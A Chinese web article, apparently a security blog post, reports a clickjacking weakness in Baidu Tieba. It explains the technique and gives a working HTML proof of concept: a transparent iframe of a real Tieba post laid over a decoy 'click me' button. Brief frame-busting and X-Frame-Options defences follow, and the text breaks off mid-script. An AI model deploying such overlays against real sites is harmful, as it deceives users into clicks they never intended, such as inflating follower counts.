来源:未知 时间:2015-04-15 13:07 作者:xxadmin 阅读:次
[导读] 百度贴吧没考虑点击劫持防御,可造成恶意刷粉丝。 估计很多地方都没考虑,还可以继续挖。 点击劫持(ClickJacking)是由互联网安全专家罗伯特.汉森和耶利米.格劳斯在2008年首创的。...
百度贴吧没考虑点击劫持防御,可造成恶意刷粉丝。 估计很多地方都没考虑,还可以继续挖。 点击劫持(ClickJacking)是由互联网安全专家罗伯特.汉森和耶利米.格劳斯在2008年首创的。是一种视觉欺骗手段,在Web端就是Iframe嵌套一个透明不可见的页面,让用户在不知情的情况下,点击攻击者想要欺骗用户点击的位置。 我的本地页面代码: <html> <head> <meta charset="utf-8" /> <title>demo</title> </head> <div style="z-index:999;opacity:0.0;width:2000px; height:2500px;overflow:hidden;position:absolute;"> <iframe id="inner" style="position:absolute;top:0px;width:1500px;height:1500px;left:0px;" src="http://tieba.baidu.com/p/3564916309"></iframe> </div> <button id="click" style="cursor:pointer;z-index:10px;position:absolute;top:235px;left:438px;text-align:center;width:84px;height:35px;">点我试试</button> </html> 解决方案:一、X-FRAME-OPTIONS <head> <style> body { display : none;} </style> </head> <body> <script> if (self == top) { var theBody = document.getElementsByTagName('body')[0]; theBody.style.display = "block"; } else { top.location = self.location; } </script> |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com